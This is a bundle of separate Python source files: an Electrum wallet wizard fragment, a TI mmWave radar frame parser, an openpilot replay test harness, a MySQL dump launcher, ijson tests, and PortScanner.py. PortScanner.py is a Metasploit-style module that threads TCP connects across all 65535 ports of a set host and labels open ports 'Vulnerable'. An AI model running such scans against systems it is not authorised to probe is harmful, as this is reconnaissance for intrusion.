hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("EXOS-Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let EXOS-Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
x8_mmw.py
|
#
# Copyright (c) 2020, Manfred Constapel
# This file is licensed under the terms of the MIT license.
#
#
# TI IWR6843 ES2.0 @ mmWave SDK demo of SDK 3.4.0.3
# TI IWR1843 ES1.0 @ mmWave SDK demo of SDK 3.4.0.3
#
import sys
import json
import serial
import threading
import struct
from lib.shell import *
from lib.helper import *
from lib.utility import *
from lib.logger import *
# ------------------------------------------------
_meta_ = {
'mss': 'MMW Demo',
'dev': ('xWR18xx', 'xWR68xx', 'xWR64xx'),
'ver': ('03.04.00.03', '03.05.00.04',),
'cli': 'mmwDemo:/>',
'seq': b'\x02\x01\x04\x03\x06\x05\x08\x07',
'blk': 32,
'aux': 921600,
'ant': (4, 3),
'app': {
'logMagRange': ('plot_range_profile', ), # 'capture_range_profile',),
'noiseProfile': ('plot_range_profile', ),
'detectedObjects': ('plot_detected_objects', ), # 'simple_cfar_clustering',),
'rangeAzimuthHeatMap': ('plot_range_azimuth_heat_map', ),
'rangeDopplerHeatMap': ('plot_range_doppler_heat_map', )
}
}
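# Field notes for _meta_ (best-effort reading of how the values are used below):
#   'seq' - magic word that prefixes every data frame on the auxiliary UART
#   'blk' - chunk size in bytes for reads from the auxiliary port
#   'aux' - baud rate of the auxiliary (data) port
#   'ant' - assumed (RX, TX) antenna count; sizes the default phase-bias vector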
# ------------------------------------------------
apps = {}
verbose = False
# ------------------------------------------------
log = Logger(verbose)
# ------------------------------------------------
def _read_(dat, target=sys.stdout):
target.write(dat)
target.flush()
for ver in _meta_['ver']:
for dev in _meta_['dev']:
if all((tag in dat for tag in (dev, _meta_['mss'], ver))):
return dev # reset detected
if _meta_['cli'] in dat: return (None,) # cli ready
return () # unknown state
def _init_(prt, dev, cfg, dat):
aux = serial.Serial(dat, _meta_['aux'], timeout=0.01)
taux = threading.Thread(target=_data_, args=(aux,))
taux.start()
def _conf_(cfg):
global verbose
c = dict(cfg)
p = {'log_lin': float('nan'), 'fft_comp': float('nan'), 'range_bias': float('nan')}
if '_comment_' in c:
c.pop('_comment_', None) # remove entry
if '_apps_' in c:
_meta_['app'] = c['_apps_']
c.pop('_apps_', None) # remove entry
if '_settings_' in c:
rx_ant = int(c['_settings_']['rxAntennas'])
tx_ant = int(c['_settings_']['txAntennas'])
# common
if c['channelCfg']['rxMask'] is None:
c['channelCfg']['rxMask'] = 2**rx_ant - 1
if c['channelCfg']['txMask'] is None:
n = tx_ant
if n == 1: n = 0
else: n = 2 * n
c['channelCfg']['txMask'] = 1 + n
if c['channelCfg']['cascading'] is None:
c['channelCfg']['cascading'] = 0 # always 0
# range bias for post-processing
if 'rangeBias' not in c['_settings_'] or c['_settings_']['rangeBias'] is None:
c['_settings_']['rangeBias'] = 0
# range bias for pre-processing
if 'compRangeBiasAndRxChanPhase' in c:
if c['compRangeBiasAndRxChanPhase']['rangeBias'] is None:
c['compRangeBiasAndRxChanPhase']['rangeBias'] = c['_settings_']['rangeBias']
if c['compRangeBiasAndRxChanPhase']['phaseBias'] is None or \
type(c['compRangeBiasAndRxChanPhase']['phaseBias']) == list and \
len(c['compRangeBiasAndRxChanPhase']['phaseBias']) == 0:
c['compRangeBiasAndRxChanPhase']['phaseBias'] = [1, 0] * _meta_['ant'][0] * _meta_['ant'][1]
# cli output
if 'verbose' in c['_settings_'] and c['_settings_']['verbose'] is not None:
verbose = c['_settings_']['verbose']
if c['dfeDataOutputMode']['type'] is None:
c['dfeDataOutputMode']['type'] = 1 # legacy (no subframes)
if c['adcCfg']['adcBits'] is None:
c['adcCfg']['adcBits'] = 2 # 16 bit
log_lin_scale = 1.0 / 512
if num_tx_elev_antenna(c) == 1: log_lin_scale = log_lin_scale * 4.0 / 3 # MMWSDK-439
fft_scale_comp_1d = fft_doppler_scale_compensation(32, num_range_bin(c))
fft_scale_comp_2d = 1
fft_scale_comp = fft_scale_comp_2d * fft_scale_comp_1d
p['log_lin'], p['fft_comp'], p['range_bias'] = log_lin_scale, fft_scale_comp, c['_settings_']['rangeBias']
c.pop('_settings_', None) # remove entry
return c, p
def _proc_(cfg, par, err={1: 'miss', 2: 'exec', 3: 'plot'}):
global apps
for _, app in apps.items(): app.kill()
apps.clear()
for cmd, app in _meta_['app'].items():
if type(app) not in (list, tuple): app = (app,)
for item in app:
if cmd in cfg['guiMonitor'] and cfg['guiMonitor'][cmd] == 1 and item is not None:
if item not in apps:
apps[item], values = exec_app(item, (cfg, par, ))
if values is None: values = []
code = apps[item].poll()
if code is None:
print_log(item, values)
tapp = threading.Thread(target=_grab_, args=(item,))
tapp.start()
else:
print_log(item, values, RuntimeError(err[code]))
def _pipe_(dat):
for tag in apps:
if apps[tag] is None: continue
try:
apps[tag].stdin.write(str.encode(dat + '\n'))
apps[tag].stdin.flush()
except Exception as e:
print_log(e, sys._getframe(), tag)
apps[tag].kill()
apps[tag] = None
def _grab_(tag):
try:
while True:
line = apps[tag].stderr.readline()
if line:
line = line.decode('latin-1')
print_log(None, tag, line.strip())
except:
pass
# ------------------------------------------------
def _data_(prt): # observe auxiliary port and process incoming data
if not prt.timeout:
raise TypeError('no timeout for serial port provided')
input, output, sync, size = {'buffer': b''}, {}, False, _meta_['blk']
dataFramePrev = {}
while True:
try:
data = prt.read(size)
input['buffer'] += data
if data[:len(_meta_['seq'])] == _meta_['seq']: # check for magic sequence
if len(output) > 0:
plain = json.dumps(output)
_pipe_(plain)
if verbose:
print(plain, file=sys.stdout, flush=True) # just print output to stdout
input['buffer'] = data
input['blocks'] = -1
input['address'] = 0
input['values'] = 0
input['other'] = {}
output = {}
sync = True # very first frame in the stream was seen
if sync:
flen = 0
while flen < len(input['buffer']): # keep things finite
flen = len(input['buffer'])
aux_buffer(input, output) # do processing of captured bytes
if len(output) == 0: # filter out empty and duplicate frames from log
if dataFramePrev.setdefault('header', {}).setdefault('objects', 0) > 0:
log.message(dataFramePrev)
dataFramePrev = output
except serial.serialutil.SerialException:
return # leave thread
except Exception as e:
print_log(e, sys._getframe())
# ------------------------------------------------
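# aux_buffer() below parses one frame incrementally: parser state is carried in 'input'
# ('blocks' = TLV segments still expected, 'address' = TLV type currently being consumed,
# 'values' = items still expected for that TLV), while decoded results accumulate in 'output'.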
def aux_buffer(input, output, head=40, indices={
1: 'detected_points', 2: 'range_profile', 3: 'noise_profile',
4: 'azimuth_static', 5: 'range_doppler', 6: 'stats', 7: 'side_info'}):
def aux_head(dat, n=head):
m = dat[ 0: 8] # magic
v = intify(dat[ 8:12], 10) # version
l = intify(dat[12:16]) # length
d = intify(dat[16:20], 10) # platform
f = intify(dat[20:24]) # frame number
t = intify(dat[24:28]) # cpu cycles
o = intify(dat[28:32]) # num objects
s = intify(dat[32:36]) # segments
u = intify(dat[36: n]) # subframe
return n, v, l, d, f, t, o, s, u
def aux_struct(dat, n=8):
t = intify(dat[ 0: 4])
l = intify(dat[ 4: n])
return n, t, l // 2
def aux_object(dat, oth, n=16): # detected points/objects
#x = struct.unpack('f',dat[ 0: 4])[0]
#y = struct.unpack('f',dat[ 4: 8])[0]
#z = struct.unpack('f',dat[ 8:12])[0]
#p = struct.unpack('f',dat[12: n])[0]
x = intify(dat[ 0: 4])
y = intify(dat[ 4: 8])
z = intify(dat[ 8:12])
p = intify(dat[12: n])
if x > 32767: x -= 65536
if y > 32767: y -= 65536
if z > 32767: z -= 65536
qfrac = 0
if 'qfrac' in oth: qfrac = oth['qfrac'] # q-notation is used
x = q_to_dec(x, qfrac)
y = q_to_dec(y, qfrac)
z = q_to_dec(z, qfrac)
return n, p, x, y, z
def aux_profile(dat, n=2): # value of range or noise profile
v = intify(dat[ 0: n])
return n, v
def aux_heatmap(dat, sgn, n=2): # value for heatmaps
v = intify(dat[ 0: n])
if sgn and v > 32767: v -= 65536
return n, v
def aux_info(dat, n=24): # performance measures and statistical data
ifpt = intify(dat[ 0: 4])
tot = intify(dat[ 4: 8])
ifpm = intify(dat[ 8:12])
icpm = intify(dat[12:16])
afpl = intify(dat[16:20])
ifpl = intify(dat[20: n])
return n, ifpt, tot, ifpm, icpm, afpl, ifpl
# ----------
buffer, blocks, address, values, other = \
input['buffer'], input['blocks'], input['address'], input['values'], input['other']
def progress(n, block, value):
nonlocal buffer, values, address
buffer = buffer[n:]
values -= 1
if values == 0: address = 0
try:
output[block].append(value)
except:
try:
output[block][value[0]] = value[1]
except:
output[block] = value
# ----------
# 7) point cloud side info
while address == 7 and len(buffer) >= 4 and values > 0:
buffer = buffer[4:] # TODO
values -= 1
if values == 0: address = 0
# 6) statistics (raw values)
if address == 6 and len(buffer) >= 24 and values > 0:
n, ifpt, tot, ifpm, icpm, afpl, ifpl = aux_info(buffer)
progress(n, indices[address], {
'interframe_processing': ifpt,
'transmit_output': tot,
'processing_margin': {
'interframe': ifpm,
'interchirp': icpm},
'cpu_load': {
'active_frame': afpl,
'interframe': ifpl}
})
# 5) range-doppler heatmap: entire, 2D, log mag range/Doppler array
while address == 5 and len(buffer) >= 2 and values > 0:
n, v = aux_heatmap(buffer, False)
progress(n, indices[address], v)
# 4) range-azimuth heatmap: azimuth data from the radar cube matrix
while address == 4 and len(buffer) >= 2 and values > 0:
n, v = aux_heatmap(buffer, True)
progress(n, indices[address], v)
# 3) 1D array of data considered “noise”
while address == 3 and len(buffer) >= 2 and values > 0:
n, v = aux_profile(buffer)
progress(n, indices[address], q_to_db(v))
# 2) 1D array of log mag range ffts – i.e. the first column of the log mag range-Doppler matrix
while address == 2 and len(buffer) >= 2 and values > 0:
n, v = aux_profile(buffer)
progress(n, indices[address], q_to_db(v))
# 1) point cloud
while address == 1 and len(buffer) >= 16 * output['header']['objects'] and values > 0:
numPoints = output['header']['objects']
for i in range(numPoints):
n, p, x, y, z = aux_object(buffer, other)
progress(n, indices[address], ('{},{}'.format(i, i), {'v': p, 'x': x, 'y': y, 'z': z}))
# ----------
# 0b) segment
if len(buffer) >= 8 and blocks > 0 and address == 0:
n, address, values = aux_struct(buffer)
buffer = buffer[n:]
blocks -= 1
if address in (1, 7):
output[indices[address]] = {}
elif address in (2, 3, 4, 5):
output[indices[address]] = []
elif address in (6, ):
output[indices[address]] = None
# 0a) header
if len(buffer) >= head and blocks == -1 and address == 0 and values == 0:
n, v, l, d, f, t, o, s, u = aux_head(buffer)
buffer = buffer[n:]
blocks = s
output['header'] = {'version': v, 'length': l, 'platform': d, 'number': f, 'time': t, 'objects': o, 'blocks': s, 'subframe': u}
# ----------
input['buffer'] = buffer
input['blocks'] = blocks
input['address'] = address
input['values'] = values
input['other'] = other
|
process_replay.py
|
#!/usr/bin/env python3
import capnp
import os
import sys
import threading
import importlib
import time
if "CI" in os.environ:
def tqdm(x):
return x
else:
from tqdm import tqdm # type: ignore
from cereal import car, log
from selfdrive.car.car_helpers import get_car
import selfdrive.manager as manager
import cereal.messaging as messaging
from common.params import Params
from cereal.services import service_list
from collections import namedtuple
from selfdrive.manager import managed_processes
# Numpy gives different results based on CPU features after version 19
NUMPY_TOLERANCE = 1e-7
ProcessConfig = namedtuple('ProcessConfig', ['proc_name', 'pub_sub', 'ignore', 'init_callback', 'should_recv_callback', 'tolerance'])
def wait_for_event(evt):
if not evt.wait(15):
if threading.currentThread().getName() == "MainThread":
# tested process likely died. don't let test just hang
raise Exception("Timeout reached. Tested process likely crashed.")
else:
# done testing this process, let it die
sys.exit(0)
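# FakeSocket hands the process under test exactly one message per step: the recv_called /
# recv_ready events form a two-phase handshake between the test thread and the process thread.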
class FakeSocket:
def __init__(self, wait=True):
self.data = []
self.wait = wait
self.recv_called = threading.Event()
self.recv_ready = threading.Event()
def receive(self, non_blocking=False):
if non_blocking:
return None
if self.wait:
self.recv_called.set()
wait_for_event(self.recv_ready)
self.recv_ready.clear()
return self.data.pop()
def send(self, data):
if self.wait:
wait_for_event(self.recv_called)
self.recv_called.clear()
self.data.append(data)
if self.wait:
self.recv_ready.set()
def wait_for_recv(self):
wait_for_event(self.recv_called)
class DumbSocket:
def __init__(self, s=None):
if s is not None:
try:
dat = messaging.new_message(s)
except capnp.lib.capnp.KjException: # pylint: disable=c-extension-no-member
# lists
dat = messaging.new_message(s, 0)
self.data = dat.to_bytes()
def receive(self, non_blocking=False):
return self.data
def send(self, dat):
pass
class FakeSubMaster(messaging.SubMaster):
def __init__(self, services):
super(FakeSubMaster, self).__init__(services, addr=None)
self.sock = {s: DumbSocket(s) for s in services}
self.update_called = threading.Event()
self.update_ready = threading.Event()
self.wait_on_getitem = False
def __getitem__(self, s):
# hack to know when fingerprinting is done
if self.wait_on_getitem:
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
return self.data[s]
def update(self, timeout=-1):
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
def update_msgs(self, cur_time, msgs):
wait_for_event(self.update_called)
self.update_called.clear()
super(FakeSubMaster, self).update_msgs(cur_time, msgs)
self.update_ready.set()
def wait_for_update(self):
wait_for_event(self.update_called)
class FakePubMaster(messaging.PubMaster):
def __init__(self, services): # pylint: disable=super-init-not-called
self.data = {}
self.sock = {}
self.last_updated = None
for s in services:
try:
data = messaging.new_message(s)
except capnp.lib.capnp.KjException:
data = messaging.new_message(s, 0)
self.data[s] = data.as_reader()
self.sock[s] = DumbSocket()
self.send_called = threading.Event()
self.get_called = threading.Event()
def send(self, s, dat):
self.last_updated = s
if isinstance(dat, bytes):
self.data[s] = log.Event.from_bytes(dat)
else:
self.data[s] = dat.as_reader()
self.send_called.set()
wait_for_event(self.get_called)
self.get_called.clear()
def wait_for_msg(self):
wait_for_event(self.send_called)
self.send_called.clear()
dat = self.data[self.last_updated]
self.get_called.set()
return dat
def fingerprint(msgs, fsm, can_sock):
print("start fingerprinting")
fsm.wait_on_getitem = True
# populate fake socket with data for fingerprinting
canmsgs = [msg for msg in msgs if msg.which() == "can"]
wait_for_event(can_sock.recv_called)
can_sock.recv_called.clear()
can_sock.data = [msg.as_builder().to_bytes() for msg in canmsgs[:300]]
can_sock.recv_ready.set()
can_sock.wait = False
# we know fingerprinting is done when controlsd sets sm['pathPlan'].sensorValid
wait_for_event(fsm.update_called)
fsm.update_called.clear()
fsm.wait_on_getitem = False
can_sock.wait = True
can_sock.data = []
fsm.update_ready.set()
print("finished fingerprinting")
def get_car_params(msgs, fsm, can_sock):
can = FakeSocket(wait=False)
sendcan = FakeSocket(wait=False)
canmsgs = [msg for msg in msgs if msg.which() == 'can']
for m in canmsgs[:300]:
can.send(m.as_builder().to_bytes())
_, CP = get_car(can, sendcan)
Params().put("CarParams", CP.to_bytes())
def radar_rcv_callback(msg, CP, cfg, fsm):
if msg.which() != "can":
return [], False
elif CP.radarOffCan:
return ["radarState", "liveTracks"], True
radar_msgs = {"honda": [0x445], "toyota": [0x19f, 0x22f], "gm": [0x474],
"chrysler": [0x2d4]}.get(CP.carName, None)
if radar_msgs is None:
raise NotImplementedError
for m in msg.can:
if m.src == 1 and m.address in radar_msgs:
return ["radarState", "liveTracks"], True
return [], False
def calibration_rcv_callback(msg, CP, cfg, fsm):
# calibrationd publishes 1 calibrationData every 5 cameraOdometry packets.
# should_recv always true to increment frame
recv_socks = []
frame = fsm.frame + 1 # incrementing hasn't happened yet in SubMaster
if frame == 0 or (msg.which() == 'cameraOdometry' and (frame % 5) == 0):
recv_socks = ["liveCalibration"]
return recv_socks, fsm.frame == 0 or msg.which() == 'cameraOdometry'
def ublox_rcv_callback(msg):
msg_class, msg_id = msg.ubloxRaw[2:4]
if (msg_class, msg_id) in {(1, 7 * 16)}:
return ["gpsLocationExternal"]
elif (msg_class, msg_id) in {(2, 1 * 16 + 5), (10, 9)}:
return ["ubloxGnss"]
else:
return []
CONFIGS = [
ProcessConfig(
proc_name="controlsd",
pub_sub={
"can": ["controlsState", "carState", "carControl", "sendcan", "carEvents", "carParams"],
"thermal": [], "health": [], "liveCalibration": [], "dMonitoringState": [], "plan": [], "pathPlan": [], "gpsLocation": [], "liveLocationKalman": [],
"model": [], "frontFrame": [],
},
ignore=["logMonoTime", "valid", "controlsState.startMonoTime", "controlsState.cumLagMs"],
init_callback=fingerprint,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
),
ProcessConfig(
proc_name="radard",
pub_sub={
"can": ["radarState", "liveTracks"],
"liveParameters": [], "controlsState": [], "model": [],
},
ignore=["logMonoTime", "valid", "radarState.cumLagMs"],
init_callback=get_car_params,
should_recv_callback=radar_rcv_callback,
tolerance=None,
),
ProcessConfig(
proc_name="plannerd",
pub_sub={
"model": ["pathPlan"], "radarState": ["plan"],
"carState": [], "controlsState": [], "liveParameters": [],
},
ignore=["logMonoTime", "valid", "plan.processingDelay"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=None,
),
ProcessConfig(
proc_name="calibrationd",
pub_sub={
"carState": ["liveCalibration"],
"cameraOdometry": []
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=calibration_rcv_callback,
tolerance=None,
),
ProcessConfig(
proc_name="dmonitoringd",
pub_sub={
"driverState": ["dMonitoringState"],
"liveCalibration": [], "carState": [], "model": [], "gpsLocation": [],
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
),
ProcessConfig(
proc_name="locationd",
pub_sub={
"cameraOdometry": ["liveLocationKalman"],
"sensorEvents": [], "gpsLocationExternal": [], "liveCalibration": [], "carState": [],
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
),
ProcessConfig(
proc_name="paramsd",
pub_sub={
"liveLocationKalman": ["liveParameters"],
"carState": []
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
),
ProcessConfig(
proc_name="ubloxd",
pub_sub={
"ubloxRaw": ["ubloxGnss", "gpsLocationExternal"],
},
ignore=["logMonoTime"],
init_callback=None,
should_recv_callback=ublox_rcv_callback,
tolerance=None,
),
]
def replay_process(cfg, lr):
proc = managed_processes[cfg.proc_name]
if isinstance(proc, str):
return python_replay_process(cfg, lr)
else:
return cpp_replay_process(cfg, lr)
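# Hedged usage sketch (not part of this module): how replay_process is typically driven.
# The route path is a placeholder and LogReader is assumed to come from openpilot's tools:
#
#   from tools.lib.logreader import LogReader
#   lr = list(LogReader("<route_segment>/rlog.bz2"))
#   log_msgs = replay_process(CONFIGS[0], lr)  # replay controlsd against the recorded log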
def python_replay_process(cfg, lr):
sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub]
pub_sockets = [s for s in cfg.pub_sub.keys() if s != 'can']
fsm = FakeSubMaster(pub_sockets)
fpm = FakePubMaster(sub_sockets)
args = (fsm, fpm)
if 'can' in list(cfg.pub_sub.keys()):
can_sock = FakeSocket()
args = (fsm, fpm, can_sock)
all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
params = Params()
params.clear_all()
params.manager_start()
params.put("OpenpilotEnabledToggle", "1")
params.put("Passive", "0")
params.put("CommunityFeaturesToggle", "1")
os.environ['NO_RADAR_SLEEP'] = "1"
os.environ['SKIP_FW_QUERY'] = "1"
os.environ['FINGERPRINT'] = ""
for msg in lr:
if msg.which() == 'carParams':
# TODO: get a stock VW route
if "Generic Volkswagen" not in msg.carParams.carFingerprint:
os.environ['FINGERPRINT'] = msg.carParams.carFingerprint
break
manager.prepare_managed_process(cfg.proc_name)
mod = importlib.import_module(manager.managed_processes[cfg.proc_name])
thread = threading.Thread(target=mod.main, args=args)
thread.daemon = True
thread.start()
if cfg.init_callback is not None:
if 'can' not in list(cfg.pub_sub.keys()):
can_sock = None
cfg.init_callback(all_msgs, fsm, can_sock)
CP = car.CarParams.from_bytes(params.get("CarParams", block=True))
# wait for started process to be ready
if 'can' in list(cfg.pub_sub.keys()):
can_sock.wait_for_recv()
else:
fsm.wait_for_update()
log_msgs, msg_queue = [], []
for msg in tqdm(pub_msgs):
if cfg.should_recv_callback is not None:
recv_socks, should_recv = cfg.should_recv_callback(msg, CP, cfg, fsm)
else:
recv_socks = [s for s in cfg.pub_sub[msg.which()] if
(fsm.frame + 1) % int(service_list[msg.which()].frequency / service_list[s].frequency) == 0]
should_recv = bool(len(recv_socks))
if msg.which() == 'can':
can_sock.send(msg.as_builder().to_bytes())
else:
msg_queue.append(msg.as_builder())
if should_recv:
fsm.update_msgs(0, msg_queue)
msg_queue = []
recv_cnt = len(recv_socks)
while recv_cnt > 0:
m = fpm.wait_for_msg()
log_msgs.append(m)
recv_cnt -= m.which() in recv_socks
return log_msgs
def cpp_replay_process(cfg, lr):
sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub] # We get responses here
pm = messaging.PubMaster(cfg.pub_sub.keys())
sockets = {s : messaging.sub_sock(s, timeout=1000) for s in sub_sockets}
all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
manager.prepare_managed_process(cfg.proc_name)
manager.start_managed_process(cfg.proc_name)
time.sleep(1) # We give the process time to start
log_msgs = []
for s in sub_sockets:
messaging.recv_one_or_none(sockets[s])
for msg in tqdm(pub_msgs):
pm.send(msg.which(), msg.as_builder())
resp_sockets = sub_sockets if cfg.should_recv_callback is None else cfg.should_recv_callback(msg)
for s in resp_sockets:
response = messaging.recv_one(sockets[s])
if response is not None:
log_msgs.append(response)
manager.kill_managed_process(cfg.proc_name)
return log_msgs
|
sqlInit.py
|
import multiprocessing as mp
from dumpDist import MYSQL_DUMP_DIST
from dumpJson import MYSQL_DUMP_JSON
from dumpNext import MYSQL_DUMP_NEXT
from dumpVertex import MYSQL_DUMP_VERTEX
from dumpposter import MYSQL_DUMP_POSTER
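# Run every MySQL dump job in its own process and wait for all of them to finish.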
if __name__ == '__main__':
func = [MYSQL_DUMP_DIST, MYSQL_DUMP_JSON, MYSQL_DUMP_NEXT, MYSQL_DUMP_VERTEX, MYSQL_DUMP_POSTER]
n = len(func)
p = [None] * n
for i in range(0, n):
p[i] = mp.Process(target=func[i])
p[i].start()
for i in range(0, n):
p[i].join()
for i in range(0, n):
p[i].close()
|
PortScanner.py
|
import socket
import threading

# Fore/Style come from colorama (assumed: the original module used them without an import)
from colorama import Fore, Style

from core import logger


class Auxiliary:
    config = {
        "RHOST": "127.0.0.1",
        "Thread": "300"
    }

    def show_options(self):
        print(Fore.YELLOW + "Options" + Style.RESET_ALL)
        print(Fore.YELLOW + "-------" + Style.RESET_ALL)
        for key in sorted(self.config.keys()):
            print(Fore.YELLOW + key, self.get_config(key), Style.RESET_ALL)

    @staticmethod
    def show_info():
        print(Fore.YELLOW + "\nThis auxiliary module scans all TCP ports \non the given host" + Style.RESET_ALL)

    def set_config(self, key, value):
        if key in self.config.keys():
            self.config[key] = value
        else:
            print("No options")

    def get_config(self, key):
        return self.config[key]

    def run(self):
        rhost = self.config["RHOST"]

        def scanner(rport):
            sock = socket.socket()
            sock.settimeout(3)
            if sock.connect_ex((rhost, rport)) == 0:
                logger.Vulnerable("Port {}".format(rport))
            else:
                logger.NotVulnerable("Port {}".format(rport))
            sock.close()

        # scan ports 1-65535, keeping at most "Thread" probes in flight at a time
        batch_size = int(self.config["Thread"])
        threads = []
        for rport in range(1, 65536):
            thread = threading.Thread(target=scanner, args=(rport,))
            thread.start()
            threads.append(thread)
            if len(threads) >= batch_size:
                for t in threads:
                    t.join()
                threads = []
        for t in threads:
            t.join()
|
tests.py
|
# -*- coding:utf-8 -*-
from __future__ import unicode_literals
import unittest
from io import BytesIO
from decimal import Decimal
import threading
from importlib import import_module
from ijson import common
from ijson.backends.python import basic_parse
from ijson.compat import IS_PY2
JSON = b'''
{
"docs": [
{
"string": "\\u0441\\u0442\\u0440\\u043e\\u043a\\u0430 - \xd1\x82\xd0\xb5\xd1\x81\xd1\x82",
"null": null,
"boolean": false,
"integer": 0,
"double": 0.5,
"exponent": 1.0e+2,
"long": 10000000000
},
{
"meta": [[1], {}]
},
{
"meta": {"key": "value"}
},
{
"meta": null
}
]
}
'''
SCALAR_JSON = b'0'
EMPTY_JSON = b''
INVALID_JSON = b'{"key": "value",}'
INCOMPLETE_JSON = b'"test'
STRINGS_JSON = br'''
{
"str1": "",
"str2": "\"",
"str3": "\\",
"str4": "\\\\"
}
'''
class Parse(object):
'''
Base class for parsing tests that is used to create test cases for each
available backend.
'''
def test_basic_parse(self):
events = list(self.backend.basic_parse(BytesIO(JSON)))
reference = [
('start_map', None),
('map_key', 'docs'),
('start_array', None),
('start_map', None),
('map_key', 'string'),
('string', 'строка - тест'),
('map_key', 'null'),
('null', None),
('map_key', 'boolean'),
('boolean', False),
('map_key', 'integer'),
('number', 0),
('map_key', 'double'),
('number', Decimal('0.5')),
('map_key', 'exponent'),
('number', Decimal('100')),
('map_key', 'long'),
('number', 10000000000),
('end_map', None),
('start_map', None),
('map_key', 'meta'),
('start_array', None),
('start_array', None),
('number', 1),
('end_array', None),
('start_map', None),
('end_map', None),
('end_array', None),
('end_map', None),
('start_map', None),
('map_key', 'meta'),
('start_map', None),
('map_key', 'key'),
('string', 'value'),
('end_map', None),
('end_map', None),
('start_map', None),
('map_key', 'meta'),
('null', None),
('end_map', None),
('end_array', None),
('end_map', None),
]
for e, r in zip(events, reference):
self.assertEqual(e, r)
def test_basic_parse_threaded(self):
thread = threading.Thread(target=self.test_basic_parse)
thread.start()
thread.join()
def test_scalar(self):
events = list(self.backend.basic_parse(BytesIO(SCALAR_JSON)))
self.assertEqual(events, [('number', 0)])
def test_strings(self):
events = list(self.backend.basic_parse(BytesIO(STRINGS_JSON)))
strings = [value for event, value in events if event == 'string']
self.assertEqual(strings, ['', '"', '\\', '\\\\'])
def test_empty(self):
self.assertRaises(
common.IncompleteJSONError,
lambda: list(self.backend.basic_parse(BytesIO(EMPTY_JSON))),
)
def test_incomplete(self):
self.assertRaises(
common.IncompleteJSONError,
lambda: list(self.backend.basic_parse(BytesIO(INCOMPLETE_JSON))),
)
def test_invalid(self):
self.assertRaises(
common.JSONError,
lambda: list(self.backend.basic_parse(BytesIO(INVALID_JSON))),
)
def test_lazy(self):
# shouldn't fail since iterator is not exhausted
self.backend.basic_parse(BytesIO(INVALID_JSON))
self.assertTrue(True)
# Generating real TestCase classes for each importable backend
for name in ['python', 'yajl', 'yajl2']:
try:
classname = '%sParse' % name.capitalize()
if IS_PY2:
classname = classname.encode('ascii')
locals()[classname] = type(
classname,
(unittest.TestCase, Parse),
{'backend': import_module('ijson.backends.%s' % name)},
)
except ImportError:
pass
class Common(unittest.TestCase):
'''
Backend independent tests. They all use basic_parse imported explicitly from
the python backend to generate parsing events.
'''
def test_object_builder(self):
builder = common.ObjectBuilder()
for event, value in basic_parse(BytesIO(JSON)):
builder.event(event, value)
self.assertEqual(builder.value, {
'docs': [
{
'string': 'строка - тест',
'null': None,
'boolean': False,
'integer': 0,
'double': Decimal('0.5'),
'exponent': Decimal('100'),
'long': 10000000000,
},
{
'meta': [[1], {}],
},
{
'meta': {'key': 'value'},
},
{
'meta': None,
},
],
})
def test_scalar_builder(self):
builder = common.ObjectBuilder()
for event, value in basic_parse(BytesIO(SCALAR_JSON)):
builder.event(event, value)
self.assertEqual(builder.value, 0)
def test_parse(self):
events = common.parse(basic_parse(BytesIO(JSON)))
events = [value
for prefix, event, value in events
if prefix == 'docs.item.meta.item.item'
]
self.assertEqual(events, [1])
def test_items(self):
events = basic_parse(BytesIO(JSON))
